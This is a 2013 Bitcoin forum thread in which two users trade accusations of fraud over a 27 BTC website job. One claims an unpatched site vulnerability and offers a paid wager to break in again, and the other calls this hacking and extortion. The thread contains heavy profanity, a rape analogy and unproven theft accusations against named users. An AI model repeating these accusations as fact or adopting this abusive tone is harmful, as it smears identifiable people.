Also, why the fuck would I steal your coins. I don't do that.

Let's see, maybe because you're a thief and it's in your nature? That's why you defrauded the 27 bitcoins from me with the promise of a functional website (similar to the one I have now) [but] in reality you're incapable to code a bitcoin ecommerce website.

Maybe I didn't make it clear: I have no intention of ever doing any kind of business with you ever again.
The fact that the scumbag who scammed me out of 27 BTC is asking me to send coins to someone makes me sick.
You defrauded me out of 27 BTC, congrats, I'm not going to take any risk of legitimizing your theft.
I overlooked the fact that you illegally hacked into my site with a simple exploit, I even reduced your debt.
I also gave you the opportunity to come clean and reveal any information you have about site vulnerabilities for more debt reduction. You refused and that deal is now over so go fuck yourself you sorry scamming bastard.

MoneypakTrader.com (OP)
Sr. Member
****
Activity: 472
Merit: 250

Never spend your money before you have it.
June 08, 2013, 08:25:48 AM
 #54

BTW, your offer sounds just like the time:
A) you offered to pay for arbitration,
B) You NEVER filed the case, so I filed one with the option of splitting the fee
C) I paid half the fee after you refused to pay the full fee as you originally promised
D) You then REFUSED to pay even half the arbitration fee
E) Then you REFUSED to participate in arbitration blaming the arbitrator for taking too long

It's all in the forum records. . .

I have learned to give your promises the appropriate weight they deserve.

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Activity: 1316
Merit: 1043

👻
June 08, 2013, 09:19:40 AM
 #55

tl;dr: MPT blundered by making statements that he now backtracks.

I'm happy to do this through an escrow.
whiskers75
Hero Member
*****
Activity: 658
Merit: 502

Doesn't use these forums that often.
June 08, 2013, 09:53:17 AM
 #56

TF: Stop writing "has been" as "has being"! :)
Erm.... TradeFortress, prove that you can hack in by, I don't know, changing the admin user's name?

MoneypakTrader.com (OP)
Sr. Member
****
Activity: 472
Merit: 250

Never spend your money before you have it.
June 09, 2013, 02:32:17 PM
 #57

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.
[...]
 Your fraud isn't going to work here. Fool me once, you're a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.
[...] If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

So I can either lose 10 btc if you're right (which is less than a 1% possibility) or I can gain nothing if I'm right because it would go to charity (99%+ possibility). Even at those excellent odds it's a losing proposition.
Please STFU and stop harassing my baby with your BS claims.

Also, why the fuck would I steal your coins. I don't do that.

Let's see, maybe because you're a thief and it's in your nature? That's why you defrauded the 27 bitcoins from me with the promise of a functional website (similar to the one I have now) [but] in reality you're incapable to code a bitcoin ecommerce website.

Maybe I didn't make it clear: I have no intention of ever doing any kind of business with you ever again.
The fact that the scumbag who scammed me out of 27 BTC is asking me to send coins to someone makes me sick.
You defrauded me out of 27 BTC, congrats, I'm not going to take any risk of legitimizing your theft.
I overlooked the fact that you illegally hacked into my site with a simple exploit, I even reduced your debt.
I also gave you the opportunity to come clean and reveal any information you have about site vulnerabilities for more debt reduction. You refused and that deal is now over so go fuck yourself you sorry scamming bastard.

TF, you sound like a rapist trying to get into a victim's house after having already raped the victim before, not gonna happen.

You show how much of a scumbag you are by attempting to extort more money having already scammed me for supposedly coding a complete site. And now you want more coin for making the site more secure after having already fraudulently stolen more than enough coin to cover security updates (even though you are unwelcome from participating in the site at all, but you persist in harassing me about the site).
Attacking someone's site without permission and then trying to extort money from them is a real scumbag move, even though you're bullshitting and especially because you've already stolen enough to cover security fixes.
Fortunately, there's no evidence you have any current access to the admin panel or user accounts or you could verify it by posting some *recent* activity. Although the ethical thing to do is disclose the vulnerability, which you could even do publicly. But you're an unethical criminal who likes making easy coins by stealing them from me as you did with your fraudulent "I'm a web developer who can code a bitcoin accepting website" bullshit. Hard to imagine anyone can go through the whole history and take your side on this issue. . .
The code has been fixed and the site is secure, so Go Fuck Yourself.
